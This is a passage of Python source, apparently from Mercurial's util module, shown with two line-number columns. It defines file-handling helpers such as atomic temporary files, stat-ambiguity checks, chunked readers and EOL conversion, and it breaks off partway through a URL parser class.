1913 1923 '''Return the version of escape corresponding to self.compile.
1914 1924
1915 1925 This is imperfect because whether re2 or re is used for a particular
1916 1926 function depends on the flags, etc, but it's the best we can do.
1917 1927 '''
1918 1928 global _re2
1919 1929 if _re2 is None:
1920 1930 self._checkre2()
1921 1931 if _re2:
1922 1932 return re2.escape
1923 1933 else:
1924 1934 return remod.escape
1925 1935
1926 1936 re = _re()
1927 1937
1928 1938 _fspathcache = {}
1929 1939 def fspath(name, root):
1930 1940 '''Get name in the case stored in the filesystem
1931 1941
1932 1942 The name should be relative to root, and be normcase-ed for efficiency.
1933 1943
1934 1944 Note that this function is unnecessary, and should not be
1935 1945 called, for case-sensitive filesystems (simply because it's expensive).
1936 1946
1937 1947 The root should be normcase-ed, too.
1938 1948 '''
1939 1949 def _makefspathcacheentry(dir):
1940 1950 return dict((normcase(n), n) for n in os.listdir(dir))
1941 1951
1942 1952 seps = pycompat.ossep
1943 1953 if pycompat.osaltsep:
1944 1954 seps = seps + pycompat.osaltsep
1945 1955 # Protect backslashes. This gets silly very quickly.
1946 1956 seps.replace('\\','\\\\')
1947 1957 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1948 1958 dir = os.path.normpath(root)
1949 1959 result = []
1950 1960 for part, sep in pattern.findall(name):
1951 1961 if sep:
1952 1962 result.append(sep)
1953 1963 continue
1954 1964
1955 1965 if dir not in _fspathcache:
1956 1966 _fspathcache[dir] = _makefspathcacheentry(dir)
1957 1967 contents = _fspathcache[dir]
1958 1968
1959 1969 found = contents.get(part)
1960 1970 if not found:
1961 1971 # retry "once per directory" per "dirstate.walk" which
1962 1972 # may take place for each patches of "hg qpush", for example
1963 1973 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1964 1974 found = contents.get(part)
1965 1975
1966 1976 result.append(found or part)
1967 1977 dir = os.path.join(dir, part)
1968 1978
1969 1979 return ''.join(result)
1970 1980
1971 1981 def checknlink(testfile):
1972 1982 '''check whether hardlink count reporting works properly'''
1973 1983
1974 1984 # testfile may be open, so we need a separate file for checking to
1975 1985 # work around issue2543 (or testfile may get lost on Samba shares)
1976 1986 f1, f2, fp = None, None, None
1977 1987 try:
1978 1988 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1979 1989 suffix='1~', dir=os.path.dirname(testfile))
1980 1990 os.close(fd)
1981 1991 f2 = '%s2~' % f1[:-2]
1982 1992
1983 1993 oslink(f1, f2)
1984 1994 # nlinks() may behave differently for files on Windows shares if
1985 1995 # the file is open.
1986 1996 fp = posixfile(f2)
1987 1997 return nlinks(f2) > 1
1988 1998 except OSError:
1989 1999 return False
1990 2000 finally:
1991 2001 if fp is not None:
1992 2002 fp.close()
1993 2003 for f in (f1, f2):
1994 2004 try:
1995 2005 if f is not None:
1996 2006 os.unlink(f)
1997 2007 except OSError:
1998 2008 pass
1999 2009
2000 2010 def endswithsep(path):
2001 2011 '''Check path ends with os.sep or os.altsep.'''
2002 2012 return (path.endswith(pycompat.ossep)
2003 2013 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2004 2014
2005 2015 def splitpath(path):
2006 2016 '''Split path by os.sep.
2007 2017 Note that this function does not use os.altsep because this is
2008 2018 an alternative of simple "xxx.split(os.sep)".
2009 2019 It is recommended to use os.path.normpath() before using this
2010 2020 function if need.'''
2011 2021 return path.split(pycompat.ossep)
2012 2022
2013 2023 def mktempcopy(name, emptyok=False, createmode=None):
2014 2024 """Create a temporary file with the same contents from name
2015 2025
2016 2026 The permission bits are copied from the original file.
2017 2027
2018 2028 If the temporary file is going to be truncated immediately, you
2019 2029 can use emptyok=True as an optimization.
2020 2030
2021 2031 Returns the name of the temporary file.
2022 2032 """
2023 2033 d, fn = os.path.split(name)
2024 2034 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2025 2035 os.close(fd)
2026 2036 # Temporary files are created with mode 0600, which is usually not
2027 2037 # what we want. If the original file already exists, just copy
2028 2038 # its mode. Otherwise, manually obey umask.
2029 2039 copymode(name, temp, createmode)
2030 2040 if emptyok:
2031 2041 return temp
2032 2042 try:
2033 2043 try:
2034 2044 ifp = posixfile(name, "rb")
2035 2045 except IOError as inst:
2036 2046 if inst.errno == errno.ENOENT:
2037 2047 return temp
2038 2048 if not getattr(inst, 'filename', None):
2039 2049 inst.filename = name
2040 2050 raise
2041 2051 ofp = posixfile(temp, "wb")
2042 2052 for chunk in filechunkiter(ifp):
2043 2053 ofp.write(chunk)
2044 2054 ifp.close()
2045 2055 ofp.close()
2046 2056 except: # re-raises
2047 2057 try:
2048 2058 os.unlink(temp)
2049 2059 except OSError:
2050 2060 pass
2051 2061 raise
2052 2062 return temp
2053 2063
2054 2064 class filestat(object):
2055 2065 """help to exactly detect change of a file
2056 2066
2057 2067 'stat' attribute is result of 'os.stat()' if specified 'path'
2058 2068 exists. Otherwise, it is None. This can avoid preparative
2059 2069 'exists()' examination on client side of this class.
2060 2070 """
2061 2071 def __init__(self, stat):
2062 2072 self.stat = stat
2063 2073
2064 2074 @classmethod
2065 2075 def frompath(cls, path):
2066 2076 try:
2067 2077 stat = os.stat(path)
2068 2078 except OSError as err:
2069 2079 if err.errno != errno.ENOENT:
2070 2080 raise
2071 2081 stat = None
2072 2082 return cls(stat)
2073 2083
2074 2084 @classmethod
2075 2085 def fromfp(cls, fp):
2076 2086 stat = os.fstat(fp.fileno())
2077 2087 return cls(stat)
2078 2088
2079 2089 __hash__ = object.__hash__
2080 2090
2081 2091 def __eq__(self, old):
2082 2092 try:
2083 2093 # if ambiguity between stat of new and old file is
2084 2094 # avoided, comparison of size, ctime and mtime is enough
2085 2095 # to exactly detect change of a file regardless of platform
2086 2096 return (self.stat.st_size == old.stat.st_size and
2087 2097 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2088 2098 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2089 2099 except AttributeError:
2090 2100 pass
2091 2101 try:
2092 2102 return self.stat is None and old.stat is None
2093 2103 except AttributeError:
2094 2104 return False
2095 2105
2096 2106 def isambig(self, old):
2097 2107 """Examine whether new (= self) stat is ambiguous against old one
2098 2108
2099 2109 "S[N]" below means stat of a file at N-th change:
2100 2110
2101 2111 - S[n-1].ctime < S[n].ctime: can detect change of a file
2102 2112 - S[n-1].ctime == S[n].ctime
2103 2113 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2104 2114 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2105 2115 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2106 2116 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2107 2117
2108 2118 Case (*2) above means that a file was changed twice or more at
2109 2119 same time in sec (= S[n-1].ctime), and comparison of timestamp
2110 2120 is ambiguous.
2111 2121
2112 2122 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2113 2123 timestamp is ambiguous".
2114 2124
2115 2125 But advancing mtime only in case (*2) doesn't work as
2116 2126 expected, because naturally advanced S[n].mtime in case (*1)
2117 2127 might be equal to manually advanced S[n-1 or earlier].mtime.
2118 2128
2119 2129 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2120 2130 treated as ambiguous regardless of mtime, to avoid overlooking
2121 2131 by confliction between such mtime.
2122 2132
2123 2133 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2124 2134 S[n].mtime", even if size of a file isn't changed.
2125 2135 """
2126 2136 try:
2127 2137 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2128 2138 except AttributeError:
2129 2139 return False
2130 2140
2131 2141 def avoidambig(self, path, old):
2132 2142 """Change file stat of specified path to avoid ambiguity
2133 2143
2134 2144 'old' should be previous filestat of 'path'.
2135 2145
2136 2146 This skips avoiding ambiguity, if a process doesn't have
2137 2147 appropriate privileges for 'path'. This returns False in this
2138 2148 case.
2139 2149
2140 2150 Otherwise, this returns True, as "ambiguity is avoided".
2141 2151 """
2142 2152 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2143 2153 try:
2144 2154 os.utime(path, (advanced, advanced))
2145 2155 except OSError as inst:
2146 2156 if inst.errno == errno.EPERM:
2147 2157 # utime() on the file created by another user causes EPERM,
2148 2158 # if a process doesn't have appropriate privileges
2149 2159 return False
2150 2160 raise
2151 2161 return True
2152 2162
2153 2163 def __ne__(self, other):
2154 2164 return not self == other
2155 2165
2156 2166 class atomictempfile(object):
2157 2167 '''writable file object that atomically updates a file
2158 2168
2159 2169 All writes will go to a temporary copy of the original file. Call
2160 2170 close() when you are done writing, and atomictempfile will rename
2161 2171 the temporary copy to the original name, making the changes
2162 2172 visible. If the object is destroyed without being closed, all your
2163 2173 writes are discarded.
2164 2174
2165 2175 checkambig argument of constructor is used with filestat, and is
2166 2176 useful only if target file is guarded by any lock (e.g. repo.lock
2167 2177 or repo.wlock).
2168 2178 '''
2169 2179 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2170 2180 self.__name = name # permanent name
2171 2181 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2172 2182 createmode=createmode)
2173 2183 self._fp = posixfile(self._tempname, mode)
2174 2184 self._checkambig = checkambig
2175 2185
2176 2186 # delegated methods
2177 2187 self.read = self._fp.read
2178 2188 self.write = self._fp.write
2179 2189 self.seek = self._fp.seek
2180 2190 self.tell = self._fp.tell
2181 2191 self.fileno = self._fp.fileno
2182 2192
2183 2193 def close(self):
2184 2194 if not self._fp.closed:
2185 2195 self._fp.close()
2186 2196 filename = localpath(self.__name)
2187 2197 oldstat = self._checkambig and filestat.frompath(filename)
2188 2198 if oldstat and oldstat.stat:
2189 2199 rename(self._tempname, filename)
2190 2200 newstat = filestat.frompath(filename)
2191 2201 if newstat.isambig(oldstat):
2192 2202 # stat of changed file is ambiguous to original one
2193 2203 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2194 2204 os.utime(filename, (advanced, advanced))
2195 2205 else:
2196 2206 rename(self._tempname, filename)
2197 2207
2198 2208 def discard(self):
2199 2209 if not self._fp.closed:
2200 2210 try:
2201 2211 os.unlink(self._tempname)
2202 2212 except OSError:
2203 2213 pass
2204 2214 self._fp.close()
2205 2215
2206 2216 def __del__(self):
2207 2217 if safehasattr(self, '_fp'): # constructor actually did something
2208 2218 self.discard()
2209 2219
2210 2220 def __enter__(self):
2211 2221 return self
2212 2222
2213 2223 def __exit__(self, exctype, excvalue, traceback):
2214 2224 if exctype is not None:
2215 2225 self.discard()
2216 2226 else:
2217 2227 self.close()
2218 2228
2219 2229 def unlinkpath(f, ignoremissing=False, rmdir=True):
2220 2230 """unlink and remove the directory if it is empty"""
2221 2231 if ignoremissing:
2222 2232 tryunlink(f)
2223 2233 else:
2224 2234 unlink(f)
2225 2235 if rmdir:
2226 2236 # try removing directories that might now be empty
2227 2237 try:
2228 2238 removedirs(os.path.dirname(f))
2229 2239 except OSError:
2230 2240 pass
2231 2241
2232 2242 def tryunlink(f):
2233 2243 """Attempt to remove a file, ignoring ENOENT errors."""
2234 2244 try:
2235 2245 unlink(f)
2236 2246 except OSError as e:
2237 2247 if e.errno != errno.ENOENT:
2238 2248 raise
2239 2249
2240 2250 def makedirs(name, mode=None, notindexed=False):
2241 2251 """recursive directory creation with parent mode inheritance
2242 2252
2243 2253 Newly created directories are marked as "not to be indexed by
2244 2254 the content indexing service", if ``notindexed`` is specified
2245 2255 for "write" mode access.
2246 2256 """
2247 2257 try:
2248 2258 makedir(name, notindexed)
2249 2259 except OSError as err:
2250 2260 if err.errno == errno.EEXIST:
2251 2261 return
2252 2262 if err.errno != errno.ENOENT or not name:
2253 2263 raise
2254 2264 parent = os.path.dirname(os.path.abspath(name))
2255 2265 if parent == name:
2256 2266 raise
2257 2267 makedirs(parent, mode, notindexed)
2258 2268 try:
2259 2269 makedir(name, notindexed)
2260 2270 except OSError as err:
2261 2271 # Catch EEXIST to handle races
2262 2272 if err.errno == errno.EEXIST:
2263 2273 return
2264 2274 raise
2265 2275 if mode is not None:
2266 2276 os.chmod(name, mode)
2267 2277
2268 2278 def readfile(path):
2269 2279 with open(path, 'rb') as fp:
2270 2280 return fp.read()
2271 2281
2272 2282 def writefile(path, text):
2273 2283 with open(path, 'wb') as fp:
2274 2284 fp.write(text)
2275 2285
2276 2286 def appendfile(path, text):
2277 2287 with open(path, 'ab') as fp:
2278 2288 fp.write(text)
2279 2289
2280 2290 class chunkbuffer(object):
2281 2291 """Allow arbitrary sized chunks of data to be efficiently read from an
2282 2292 iterator over chunks of arbitrary size."""
2283 2293
2284 2294 def __init__(self, in_iter):
2285 2295 """in_iter is the iterator that's iterating over the input chunks."""
2286 2296 def splitbig(chunks):
2287 2297 for chunk in chunks:
2288 2298 if len(chunk) > 2**20:
2289 2299 pos = 0
2290 2300 while pos < len(chunk):
2291 2301 end = pos + 2 ** 18
2292 2302 yield chunk[pos:end]
2293 2303 pos = end
2294 2304 else:
2295 2305 yield chunk
2296 2306 self.iter = splitbig(in_iter)
2297 2307 self._queue = collections.deque()
2298 2308 self._chunkoffset = 0
2299 2309
2300 2310 def read(self, l=None):
2301 2311 """Read L bytes of data from the iterator of chunks of data.
2302 2312 Returns less than L bytes if the iterator runs dry.
2303 2313
2304 2314 If size parameter is omitted, read everything"""
2305 2315 if l is None:
2306 2316 return ''.join(self.iter)
2307 2317
2308 2318 left = l
2309 2319 buf = []
2310 2320 queue = self._queue
2311 2321 while left > 0:
2312 2322 # refill the queue
2313 2323 if not queue:
2314 2324 target = 2**18
2315 2325 for chunk in self.iter:
2316 2326 queue.append(chunk)
2317 2327 target -= len(chunk)
2318 2328 if target <= 0:
2319 2329 break
2320 2330 if not queue:
2321 2331 break
2322 2332
2323 2333 # The easy way to do this would be to queue.popleft(), modify the
2324 2334 # chunk (if necessary), then queue.appendleft(). However, for cases
2325 2335 # where we read partial chunk content, this incurs 2 dequeue
2326 2336 # mutations and creates a new str for the remaining chunk in the
2327 2337 # queue. Our code below avoids this overhead.
2328 2338
2329 2339 chunk = queue[0]
2330 2340 chunkl = len(chunk)
2331 2341 offset = self._chunkoffset
2332 2342
2333 2343 # Use full chunk.
2334 2344 if offset == 0 and left >= chunkl:
2335 2345 left -= chunkl
2336 2346 queue.popleft()
2337 2347 buf.append(chunk)
2338 2348 # self._chunkoffset remains at 0.
2339 2349 continue
2340 2350
2341 2351 chunkremaining = chunkl - offset
2342 2352
2343 2353 # Use all of unconsumed part of chunk.
2344 2354 if left >= chunkremaining:
2345 2355 left -= chunkremaining
2346 2356 queue.popleft()
2347 2357 # offset == 0 is enabled by block above, so this won't merely
2348 2358 # copy via ``chunk[0:]``.
2349 2359 buf.append(chunk[offset:])
2350 2360 self._chunkoffset = 0
2351 2361
2352 2362 # Partial chunk needed.
2353 2363 else:
2354 2364 buf.append(chunk[offset:offset + left])
2355 2365 self._chunkoffset += left
2356 2366 left -= chunkremaining
2357 2367
2358 2368 return ''.join(buf)
2359 2369
2360 2370 def filechunkiter(f, size=131072, limit=None):
2361 2371 """Create a generator that produces the data in the file size
2362 2372 (default 131072) bytes at a time, up to optional limit (default is
2363 2373 to read all data). Chunks may be less than size bytes if the
2364 2374 chunk is the last chunk in the file, or the file is a socket or
2365 2375 some other type of file that sometimes reads less data than is
2366 2376 requested."""
2367 2377 assert size >= 0
2368 2378 assert limit is None or limit >= 0
2369 2379 while True:
2370 2380 if limit is None:
2371 2381 nbytes = size
2372 2382 else:
2373 2383 nbytes = min(limit, size)
2374 2384 s = nbytes and f.read(nbytes)
2375 2385 if not s:
2376 2386 break
2377 2387 if limit:
2378 2388 limit -= len(s)
2379 2389 yield s
2380 2390
2381 2391 class cappedreader(object):
2382 2392 """A file object proxy that allows reading up to N bytes.
2383 2393
2384 2394 Given a source file object, instances of this type allow reading up to
2385 2395 N bytes from that source file object. Attempts to read past the allowed
2386 2396 limit are treated as EOF.
2387 2397
2388 2398 It is assumed that I/O is not performed on the original file object
2389 2399 in addition to I/O that is performed by this instance. If there is,
2390 2400 state tracking will get out of sync and unexpected results will ensue.
2391 2401 """
2392 2402 def __init__(self, fh, limit):
2393 2403 """Allow reading up to <limit> bytes from <fh>."""
2394 2404 self._fh = fh
2395 2405 self._left = limit
2396 2406
2397 2407 def read(self, n=-1):
2398 2408 if not self._left:
2399 2409 return b''
2400 2410
2401 2411 if n < 0:
2402 2412 n = self._left
2403 2413
2404 2414 data = self._fh.read(min(n, self._left))
2405 2415 self._left -= len(data)
2406 2416 assert self._left >= 0
2407 2417
2408 2418 return data
2409 2419
2410 2420 def readinto(self, b):
2411 2421 res = self.read(len(b))
2412 2422 if res is None:
2413 2423 return None
2414 2424
2415 2425 b[0:len(res)] = res
2416 2426 return len(res)
2417 2427
2418 2428 def unitcountfn(*unittable):
2419 2429 '''return a function that renders a readable count of some quantity'''
2420 2430
2421 2431 def go(count):
2422 2432 for multiplier, divisor, format in unittable:
2423 2433 if abs(count) >= divisor * multiplier:
2424 2434 return format % (count / float(divisor))
2425 2435 return unittable[-1][2] % count
2426 2436
2427 2437 return go
2428 2438
2429 2439 def processlinerange(fromline, toline):
2430 2440 """Check that linerange <fromline>:<toline> makes sense and return a
2431 2441 0-based range.
2432 2442
2433 2443 >>> processlinerange(10, 20)
2434 2444 (9, 20)
2435 2445 >>> processlinerange(2, 1)
2436 2446 Traceback (most recent call last):
2437 2447 ...
2438 2448 ParseError: line range must be positive
2439 2449 >>> processlinerange(0, 5)
2440 2450 Traceback (most recent call last):
2441 2451 ...
2442 2452 ParseError: fromline must be strictly positive
2443 2453 """
2444 2454 if toline - fromline < 0:
2445 2455 raise error.ParseError(_("line range must be positive"))
2446 2456 if fromline < 1:
2447 2457 raise error.ParseError(_("fromline must be strictly positive"))
2448 2458 return fromline - 1, toline
2449 2459
2450 2460 bytecount = unitcountfn(
2451 2461 (100, 1 << 30, _('%.0f GB')),
2452 2462 (10, 1 << 30, _('%.1f GB')),
2453 2463 (1, 1 << 30, _('%.2f GB')),
2454 2464 (100, 1 << 20, _('%.0f MB')),
2455 2465 (10, 1 << 20, _('%.1f MB')),
2456 2466 (1, 1 << 20, _('%.2f MB')),
2457 2467 (100, 1 << 10, _('%.0f KB')),
2458 2468 (10, 1 << 10, _('%.1f KB')),
2459 2469 (1, 1 << 10, _('%.2f KB')),
2460 2470 (1, 1, _('%.0f bytes')),
2461 2471 )
2462 2472
2463 2473 class transformingwriter(object):
2464 2474 """Writable file wrapper to transform data by function"""
2465 2475
2466 2476 def __init__(self, fp, encode):
2467 2477 self._fp = fp
2468 2478 self._encode = encode
2469 2479
2470 2480 def close(self):
2471 2481 self._fp.close()
2472 2482
2473 2483 def flush(self):
2474 2484 self._fp.flush()
2475 2485
2476 2486 def write(self, data):
2477 2487 return self._fp.write(self._encode(data))
2478 2488
2479 2489 # Matches a single EOL which can either be a CRLF where repeated CR
2480 2490 # are removed or a LF. We do not care about old Macintosh files, so a
2481 2491 # stray CR is an error.
2482 2492 _eolre = remod.compile(br'\r*\n')
2483 2493
2484 2494 def tolf(s):
2485 2495 return _eolre.sub('\n', s)
2486 2496
2487 2497 def tocrlf(s):
2488 2498 return _eolre.sub('\r\n', s)
2489 2499
2490 2500 def _crlfwriter(fp):
2491 2501 return transformingwriter(fp, tocrlf)
2492 2502
2493 2503 if pycompat.oslinesep == '\r\n':
2494 2504 tonativeeol = tocrlf
2495 2505 fromnativeeol = tolf
2496 2506 nativeeolwriter = _crlfwriter
2497 2507 else:
2498 2508 tonativeeol = pycompat.identity
2499 2509 fromnativeeol = pycompat.identity
2500 2510 nativeeolwriter = pycompat.identity
2501 2511
2502 2512 if (pyplatform.python_implementation() == 'CPython' and
2503 2513 sys.version_info < (3, 0)):
2504 2514 # There is an issue in CPython that some IO methods do not handle EINTR
2505 2515 # correctly. The following table shows what CPython version (and functions)
2506 2516 # are affected (buggy: has the EINTR bug, okay: otherwise):
2507 2517 #
2508 2518 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2509 2519 # --------------------------------------------------
2510 2520 # fp.__iter__ | buggy | buggy | okay
2511 2521 # fp.read* | buggy | okay [1] | okay
2512 2522 #
2513 2523 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2514 2524 #
2515 2525 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2516 2526 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2517 2527 #
2518 2528 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2519 2529 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2520 2530 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2521 2531 # fp.__iter__ but not other fp.read* methods.
2522 2532 #
2523 2533 # On modern systems like Linux, the "read" syscall cannot be interrupted
2524 2534 # when reading "fast" files like on-disk files. So the EINTR issue only
2525 2535 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2526 2536 # files approximately as "fast" files and use the fast (unsafe) code path,
2527 2537 # to minimize the performance impact.
2528 2538 if sys.version_info >= (2, 7, 4):
2529 2539 # fp.readline deals with EINTR correctly, use it as a workaround.
2530 2540 def _safeiterfile(fp):
2531 2541 return iter(fp.readline, '')
2532 2542 else:
2533 2543 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2534 2544 # note: this may block longer than necessary because of bufsize.
2535 2545 def _safeiterfile(fp, bufsize=4096):
2536 2546 fd = fp.fileno()
2537 2547 line = ''
2538 2548 while True:
2539 2549 try:
2540 2550 buf = os.read(fd, bufsize)
2541 2551 except OSError as ex:
2542 2552 # os.read only raises EINTR before any data is read
2543 2553 if ex.errno == errno.EINTR:
2544 2554 continue
2545 2555 else:
2546 2556 raise
2547 2557 line += buf
2548 2558 if '\n' in buf:
2549 2559 splitted = line.splitlines(True)
2550 2560 line = ''
2551 2561 for l in splitted:
2552 2562 if l[-1] == '\n':
2553 2563 yield l
2554 2564 else:
2555 2565 line = l
2556 2566 if not buf:
2557 2567 break
2558 2568 if line:
2559 2569 yield line
2560 2570
2561 2571 def iterfile(fp):
2562 2572 fastpath = True
2563 2573 if type(fp) is file:
2564 2574 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2565 2575 if fastpath:
2566 2576 return fp
2567 2577 else:
2568 2578 return _safeiterfile(fp)
2569 2579 else:
2570 2580 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2571 2581 def iterfile(fp):
2572 2582 return fp
2573 2583
2574 2584 def iterlines(iterator):
2575 2585 for chunk in iterator:
2576 2586 for line in chunk.splitlines():
2577 2587 yield line
2578 2588
2579 2589 def expandpath(path):
2580 2590 return os.path.expanduser(os.path.expandvars(path))
2581 2591
2582 2592 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2583 2593 """Return the result of interpolating items in the mapping into string s.
2584 2594
2585 2595 prefix is a single character string, or a two character string with
2586 2596 a backslash as the first character if the prefix needs to be escaped in
2587 2597 a regular expression.
2588 2598
2589 2599 fn is an optional function that will be applied to the replacement text
2590 2600 just before replacement.
2591 2601
2592 2602 escape_prefix is an optional flag that allows using doubled prefix for
2593 2603 its escaping.
2594 2604 """
2595 2605 fn = fn or (lambda s: s)
2596 2606 patterns = '|'.join(mapping.keys())
2597 2607 if escape_prefix:
2598 2608 patterns += '|' + prefix
2599 2609 if len(prefix) > 1:
2600 2610 prefix_char = prefix[1:]
2601 2611 else:
2602 2612 prefix_char = prefix
2603 2613 mapping[prefix_char] = prefix_char
2604 2614 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2605 2615 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2606 2616
2607 2617 def getport(port):
2608 2618 """Return the port for a given network service.
2609 2619
2610 2620 If port is an integer, it's returned as is. If it's a string, it's
2611 2621 looked up using socket.getservbyname(). If there's no matching
2612 2622 service, error.Abort is raised.
2613 2623 """
2614 2624 try:
2615 2625 return int(port)
2616 2626 except ValueError:
2617 2627 pass
2618 2628
2619 2629 try:
2620 2630 return socket.getservbyname(pycompat.sysstr(port))
2621 2631 except socket.error:
2622 2632 raise error.Abort(_("no port number associated with service '%s'")
2623 2633 % port)
2624 2634
2625 2635 class url(object):
2626 2636 r"""Reliable URL parser.
2627 2637
2628 2638 This parses URLs and provides attributes for the following
2629 2639 components:
2630 2640
2631 2641 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2632 2642
2633 2643 Missing components are set to None. The only exception is
2634 2644 fragment, which is set to '' if present but empty.
2635 2645
2636 2646 If parsefragment is False, fragment is included in query. If
2637 2647 parsequery is False, query is included in path. If both are
2638 2648 False, both fragment and query are included in path.
2639 2649
2640 2650 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2641 2651
2642 2652 Note that for backward compatibility reasons, bundle URLs do not
2643 2653 take host names. That means 'bundle://../' has a path of '../'.
2644 2654
2645 2655 Examples:
2646 2656
2647 2657 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2648 2658 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2649 2659 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2650 2660 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2651 2661 >>> url(b'file:///home/joe/repo')
2652 2662 <url scheme: 'file', path: '/home/joe/repo'>
2653 2663 >>> url(b'file:///c:/temp/foo/')
2654 2664 <url scheme: 'file', path: 'c:/temp/foo/'>
2655 2665 >>> url(b'bundle:foo')
2656 2666 <url scheme: 'bundle', path: 'foo'>
2657 2667 >>> url(b'bundle://../foo')
2658 2668 <url scheme: 'bundle', path: '../foo'>
2659 2669 >>> url(br'c:\foo\bar')
2660 2670 <url path: 'c:\\foo\\bar'>
2661 2671 >>> url(br'\\blah\blah\blah')
2662 2672 <url path: '\\\\blah\\blah\\blah'>
2663 2673 >>> url(br'\\blah\blah\blah#baz')
2664 2674 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2665 2675 >>> url(br'file:///C:\users\me')
2666 2676 <url scheme: 'file', path: 'C:\\users\\me'>
2667 2677
2668 2678 Authentication credentials:
2669 2679
2670 2680 >>> url(b'ssh://joe:xyz@x/repo')
2671 2681 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2672 2682 >>> url(b'ssh://joe@x/repo')
2673 2683 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2674 2684
2675 2685 Query strings and fragments:
2676 2686
2677 2687 >>> url(b'http://host/a?b#c')
2678 2688 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2679 2689 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2680 2690 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2681 2691
2682 2692 Empty path:
2683 2693
2684 2694 >>> url(b'')
2685 2695 <url path: ''>
2686 2696 >>> url(b'#a')
2687 2697 <url path: '', fragment: 'a'>
2688 2698 >>> url(b'http://host/')
2689 2699 <url scheme: 'http', host: 'host', path: ''>
2690 2700 >>> url(b'http://host/#a')
2691 2701 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2692 2702
2693 2703 Only scheme:
2694 2704
2695 2705 >>> url(b'http:')
2696 2706 <url scheme: 'http'>
2697 2707 """
2698 2708
2699 2709 _safechars = "!~*'()+"
2700 2710 _safepchars = "/!~*'()+:\\"
2701 2711 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2702 2712
2703 2713 def __init__(self, path, parsequery=True, parsefragment=True):
2704 2714 # We slowly chomp away at path until we have only the path left
2705 2715 self.scheme = self.user = self.passwd = self.host = None
2706 2716 self.port = self.path = self.query = self.fragment = None
2707 2717 self._localpath = True
2708 2718 self._hostport = ''
2709 2719 self._origpath = path
2710 2720
2711 2721 if parsefragment and '#' in path:
2712 2722 path, self.fragment = path.split('#', 1)
2713 2723
2714 2724 # special case for Windows drive letters and UNC paths
2715 2725 if hasdriveletter(path) or path.startswith('\\\\'):
2716 2726 self.path = path
2717 2727 return
2718 2728
2719 2729 # For compatibility reasons, we can't handle bundle paths as
2720 2730 # normal URLS
2721 2731 if path.startswith('bundle:'):
2722 2732 self.scheme = 'bundle'
2723 2733 path = path[7:]
2724 2734 if path.startswith('//'):
2725 2735 path = path[2:]
2726 2736 self.path = path
2727 2737 return
2728 2738
2729 2739 if self._matchscheme(path):
2730 2740 parts = path.split(':', 1)
2731 2741 if parts[0]:
2732 2742 self.scheme, path = parts
2733 2743 self._localpath = False
2734 2744
2735 2745 if not path:
2736 2746 path = None
2737 2747 if self._localpath:
2738 2748 self.path = ''
2739 2749 return
2740 2750 else:
2741 2751 if self._localpath:
2742 2752 self.path = path
2743 2753 return
2744 2754
2745 2755 if parsequery and '?' in path:
2746 2756 path, self.query = path.split('?', 1)
2747 2757 if not path:
2748 2758 path = None
2749 2759 if not self.query:
2750 2760 self.query = None
2751 2761
2752 2762 # // is required to specify a host/authority
2753 2763 if path and path.startswith('//'):
2754 2764 parts = path[2:].split('/', 1)
2755 2765 if len(parts) > 1:
2756 2766 self.host, path = parts
2757 2767 else:
2758 2768 self.host = parts[0]
2759 2769 path = None
2760 2770 if not self.host:
2761 2771 self.host = None
2762 2772 # path of file:///d is /d
2763 2773 # path of file:///d:/ is d:/, not /d:/
2764 2774 if path and not hasdriveletter(path):
2765 2775 path = '/' + path
2766 2776
2767 2777 if self.host and '@' in self.host:
2768 2778 self.user, self.host = self.host.rsplit('@', 1)
2769 2779 if ':' in self.user:
2770 2780 self.user, self.passwd = self.user.split(':', 1)
2771 2781 if not self.host:
2772 2782 self.host = None
2773 2783
2774 2784 # Don't split on colons in IPv6 addresses without ports
2775 2785 if (self.host and ':' in self.host and
